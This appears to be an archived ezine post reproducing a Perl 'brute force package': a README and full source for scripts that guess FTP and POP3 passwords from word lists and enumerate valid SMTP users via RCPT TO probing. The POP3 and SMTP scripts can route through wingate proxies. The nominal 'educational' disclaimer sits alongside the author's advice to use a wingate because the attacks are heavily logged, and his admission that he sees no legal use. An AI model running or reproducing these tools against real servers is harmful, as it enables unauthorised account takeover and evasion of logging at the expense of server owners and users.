Copy Link
Add to Bookmark
Report

[og] brute force package 1.0.1

perl package to brute force pop3 and ftp account passwords and probe smtp for valid logins with wingate support. (In our honest opinion #1)

eZine's profile picture
Published in 
In our honest opinion
 · 9 months ago

README

[og] brute force package, version 1.0.1 -- by elicit (benz@slacknet.org) includes an smtp login probe, and pop3/ftp brute force password guessing #og @ irc.ndrsnet.com


NOTES:
before you read any further, please understand that THIS IS NOT A HACKING TOOL! this was written for educational *LEGAL* purposes only, and i will not be responsible for what you do with this. now that we have that clear..
this package has pretty much everything needed to retrieve account names from a host and brute force the passwords for them, except word files.
enjoy.


SMTP LOGIN PROBE:
if the smtp server does not send the same message for both valid and invalid users, we can easily tell which accounts exist. this requires a list of login names to attempt (see WORD LISTS below). since most smtp servers will let you keep trying users until a valid one is found, this script allows you to use a wingate.

Syntax:

  ./og-smtp-users.pl <host> <source email> <user list> [wingate]

POP3 BRUTE FORCE:
this script assumes that the pop3 server allows you to make infinite authentication attempts, and it will not work any other way. this simply attempts the passwords in your word list for a specific user until it finds the correct one or runs out of words. this script also allows you to use a wingate.

Syntax:

  ./og-pop3 <host> <user> <word file> [wingate]

FTP BRUTE FORCE:
this script is significantly slower than pop3 because almost all ftp servers disconnect you after a few authentication attempts. if the number of authentication attempts is not specified from the command line, it will default to 2 per connection. since so many connections need to be made, i didn't include a wingate option.

Syntax:

  ./og-ftp <host> <user> <word file> [attempts per connect (2)]

WORD LISTS:
the only site i know with word lists is packetstorm: http://packetstorm.securify.com/Crackers/wordlists


THANKS:
#og @ irc.ndrsnet.com, everyone involved in making IOHO, ice-e, heeb, seraph, halcy0n, ka0z, ben-z, BosniaGod (wrLiner), robosok, and vexation

og-ftp.pl

#!/usr/bin/perl 
#
# [og] og-ftp.pl, attempts to brute force ftp accounts
# -- elicit (benz@slacknet.org)
#
# NOTES:
# after i wrote og-pop3.pl, robosok gave me the idea to write similar
# scripts for ftp and telnet. although this will take a whole lot longer
# than pop3, some machines only run ftp. i didnt add wingate support to
# this because that would just be ridiculous; maybe later. THIS IS FOR
# EDUCATIONAL *LEGAL* PURPOSES ONLY. elicit is not responsible for what
# you do with this.
#
#
# THANKS:
# this should be with the og-brute package, so read og-pop3.pl
#
# ** THIS WILL BE HEAVILY LOGGED **


use Socket;
$ARGC=@ARGV;

system clear;
print "[og] ftp account brute force.. -by elicit- #og \@ irc.ndrsnet.com [og]\n\n";

if ($ARGC <3) {
print "[og] usage, $0 <host> <user> <word file> [attempts per connect (2)]\n\n";
exit;
}

$target=$ARGV[0];
$ruser=$ARGV[1];
$wfile=$ARGV[2];
$attempts="2";
if ($ARGV[3]) {
$attempts=$ARGV[3];
}
$cnt="0";
$num="0";
$port="21";

open(wordz1,"$wfile") or die "\n[og] word file does not exist.\n";
while(<wordz1>) {
$cnt++;
}
close(wordz1);
$isleep=($cnt / $attempts);
$eta=(($cnt * 6) + $isleep) / 60;

print "[og] $target: trying $cnt passwords for user $ruser..\n";
print "[og] $target: estimated max session time is $eta minutes.\n\n";

open(wordz2,"$wfile");
$iaddr=inet_aton($target) or die "[og] unable to resolve host.\n";
$paddr=sockaddr_in($port,$iaddr) or die "\n[og] unable to resolve host.\n";
$proto=getprotobyname('tcp') or die "\n[og] dude, your box sucks.\n";

$done="0";
$muser="USER $ruser\n";
$rquit="quit\n";

while ($done != 1) {
$acnt="0";
socket(sok,PF_INET,SOCK_STREAM,$proto) or die "\n[og] connection refused.\n";
connect(sok,$paddr) or die "\n[og] connection refused.\n";
sleep(6);
while ($acnt < $attempts) {
send(sok,$muser,0) or die "\n[og] connection lost. try using less attempts per connect.\n";
sleep(2);
$num++;
$rpass=<wordz2>;
chomp $rpass;
$mpass="PASS $rpass\n";
send(sok,$mpass,0) or die "\n[og] connection lost. try using less attempts per connect.\n";
sleep (4);
$msg='';
recv(sok,$msg,1024,0) or die "\n[og] error reading from socket!.\n";
print "$mpass$msg";
if(index($msg,"logged in") >= 0) {
print "\n\n[og] PASSWORD FOUND! login: $ruser, pass: $rpass\n";
$done="1";
exit;
}
send(sok,$rquit,0);
if(!$rpass) {
$done="1";
}
$acnt++;
}
}

print "\n\n[og] Sorry, no passwords matched for user $ruser. =<\n";
exit;

og-pop3.pl

#!/usr/bin/perl 
#
# [og] og-pop3.pl, attempts to brute force pop3 accounts using optional
# wingate support. made out of pure boredom by elicit (benz@slacknet.org)
#
# NOTES:
# the only perl pop3 brute force script i could find is in spanish,
# and i really want some of whatever they smoked before writing it.
# this one was tested under slackware 7.0, and works fine and dandy.
# of course, this is for educational _LEGAL_ purposes only, although
# i cant really think of any way you would want to use it legally =/
# I am not responsible for your use of this. oh yeah this is designed
# for pop3 daemons that allow infinite authentication attempts, and it
# will take a damn long time obviously.
#
# ** THIS WILL BE HEAVILY LOGGED! USE A WINGATE **
#
# p.s. i couldnt find a wingate to test this on, but it should work =>

use Socket;
$ARGC=@ARGV;

system clear;
print "[og] pop3 account brute force.. -by elicit- #og \@ irc.ndrsnet.com [og]\n\n";

if ($ARGC <3) {
print "[og] usage, $0 <host> <user> <word file> [wingate]\n\n";
exit;
}
if ($ARGV[3]) {
$wingate=$ARGV[3];
}

$target=$ARGV[0];
$ruser=$ARGV[1];
$wfile=$ARGV[2];
$cnt="0";
$num="0";
$port="110";
$gport="23";

open(wordz1,"$wfile") or die "\n[og] word file does not exist.\n";
while(<wordz1>) {
$cnt++;
}
close(wordz1);
$eta=($cnt * 6) / 60;

print "[og] $target: trying $cnt passwords for user $ruser..\n";
print "[og] $target: estimated max session time is $eta minutes.\n\n";

open(wordz2,"$wfile");
if ($wingate) {
$iaddr=inet_aton($wingate) or die "[og] unable to resolve wingate.\n";
$paddr=sockaddr_in($gport,$iaddr) or die "[og] unable to resolve wingate.\n";
$proto=getprotobyname('tcp') or die "\n[og] dude, your box sucks.\n";
socket(sok,PF_INET,SOCK_STREAM,$proto) or die "\n[og] wingate connection refused.\n";
connect(sok,$paddr) or die "\n[og] wingate connection refused.\n";
$mesg="$target 110";
send(sok,$mesg,0) or die "\n[og] this wingate sucks. try a different one.\n";
sleep(7);
}
if (!$wingate) {
$iaddr=inet_aton($target) or die "[og] unable to resolve host.\n";
$paddr=sockaddr_in($port,$iaddr) or die "\n[og] unable to resolve host.\n";
$proto=getprotobyname('tcp') or die "\n[og] dude, your box sucks.\n";
socket(sok,PF_INET,SOCK_STREAM,$proto) or die "\n[og] connection refused.\n";
connect(sok,$paddr) or die "\n[og] connection refused.\n";
sleep(5);
}
$done="0";
$muser="USER $ruser\n";

while ($done != 1) {
sleep(6);
send(sok,$muser,0) or die "\n[og] this server doesnt allow infinite auth attempts =P\n";
$num++;
$rpass=<wordz2>;
chomp $rpass;
$mpass="PASS $rpass\n";
send(sok,$mpass,0) or die "\n[og] this server doesnt allow infinite auth attempts =P\n";
$msg='';
recv(sok,$msg,1024,0) or die "\n[og] error reading from socket!.\n";
print "$mpass$msg";
if(index($msg,"messages") >= 0) {
print "\n\n[og] PASSWORD FOUND! login: $ruser, pass: $rpass\n";
$done="1";
exit;
}
if(!$rpass) {
$done="1";
}
}

print "\n\n[og] Sorry, no passwords matched for user $ruser. =<\n";
exit;

og-smtp-users.pl

#!/usr/bin/perl 
#
# [og] og-smtp-users.pl, attempts to probe valid login names from sendmail
# -- elicit (benz@slacknet.org)
#
# NOTES:
# obviously, you cant start brute forcing account passwords without a valid
# login on the box. this works by repeatedly trying to get an email message
# accepted to a user, and it logs every single attempt to the syslog so
# dont use this to hack! THIS IS FOR EDUCATIONAL *LEGAL* PURPOSES ONLY.
#


use Socket;
$ARGC=@ARGV;

system clear;
print "[og] smtp login probe.. -by elicit- #og \@ irc.ndrsnet.com [og]\n\n";

if ($ARGC <3) {
print "[og] usage, $0 <host> <source email> <user list> [wingate]\n\n";
exit;
}
if ($ARGV[3]) {
$wingate=$ARGV[3];
}

$target=$ARGV[0];
$ruser=$ARGV[1];
$wfile=$ARGV[2];
$cnt="0";
$num="0";
$port="25";
$gport="23";

open(wordz1,"$wfile") or die "\n[og] user list does not exist.\n";
while(<wordz1>) {
$cnt++;
}
close(wordz1);
$eta=($cnt * 4) / 60;

print "[og] $target: attempting $cnt possible logins..\n";
print "[og] $target: estimated max session time is $eta minutes.\n\n";

open(wordz2,"$wfile");
if ($wingate) {
$iaddr=inet_aton($wingate) or die "[og] unable to resolve wingate.\n";
$paddr=sockaddr_in($gport,$iaddr) or die "[og] unable to resolve wingate.\n";
$proto=getprotobyname('tcp') or die "\n[og] dude, your box sucks.\n";
socket(sok,PF_INET,SOCK_STREAM,$proto) or die "\n[og] wingate connection refused.\n";
connect(sok,$paddr) or die "\n[og] wingate connection refused.\n";
$mesg="$target 25";
send(sok,$mesg,0) or die "\n[og] this wingate sucks. try a different one.\n";
sleep(7);
}
if (!$wingate) {
$iaddr=inet_aton($target) or die "[og] unable to resolve host.\n";
$paddr=sockaddr_in($port,$iaddr) or die "\n[og] unable to resolve host.\n";
$proto=getprotobyname('tcp') or die "\n[og] dude, your box sucks.\n";
socket(sok,PF_INET,SOCK_STREAM,$proto) or die "\n[og] connection refused.\n";
connect(sok,$paddr) or die "\n[og] connection refused.\n";
sleep(5);
}
$done="0";
$helo="HELO cybercrime.gov\n";
$muser="MAIL FROM: $ruser\n";
send(sok,$helo,0) or die "\[og] unable to write to socket.\n";
sleep(2);
send(sok,$muser,0) or die "\[og] smtp didnt like our HELO request.\n";
sleep(2);
recv(sok,$msg,1024,0) or die "\[og] cant read from server.\n";
$msg='';
$rpass="RCPT TO: nonexistantuser\n";
send(sok,$rpass,0) or die "\n[og] smtp did not accept your source email address.\n";
sleep(4);
recv(sok,$msg,1024,0) or die "\n[og] this smtp server does not allow user probing.\n";
if(index($msg,"ok") >= 0) {
print "\n[og] this smtp server does not allow user probing.\n";
exit;
}
$valid="0";
while ($done != 1) {
if ($valid > 0) {
$rquit="quit\n";
send(sok,$rquit,0);
sleep(1);
socket(sok,PF_INET,SOCK_STREAM,$proto) or die "\n[og] connection refused.\n";
connect(sok,$paddr) or die "\n[og] connection refused.\n";
sleep(5);
send(sok,$helo,0) or die "\[og] unable to write to socket.\n";
sleep(2);
send(sok,$muser,0) or die "\[og] smtp didnt like our HELO request.\n";
sleep(2);
$rpass="RCPT TO: nonexistantuser\n";
send(sok,$rpass,0) or die "\n[og] smtp did not accept your source email address.\n";
sleep(2);
}
$num++;
$valid="0";
$rpass=<wordz2>;
chomp $rpass;
$mpass="RCPT TO: $rpass\n";
send(sok,$mpass,0) or die "\n[og] cant probe multiple users from this server =P\n";
$msg='';
recv(sok,$msg,1024,0) or die "\n[og] error reading from socket!.\n";
if(index($msg,"ok") >= 0) {
print "[og] VALID LOGIN FOUND! $target, user: $rpass\n";
$valid="1";
}
if(!$rpass) {
$done="1";
}
}

print "\n\n[og] sorry, none of the accounts in $wfile existed. =<\n";
exit;

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT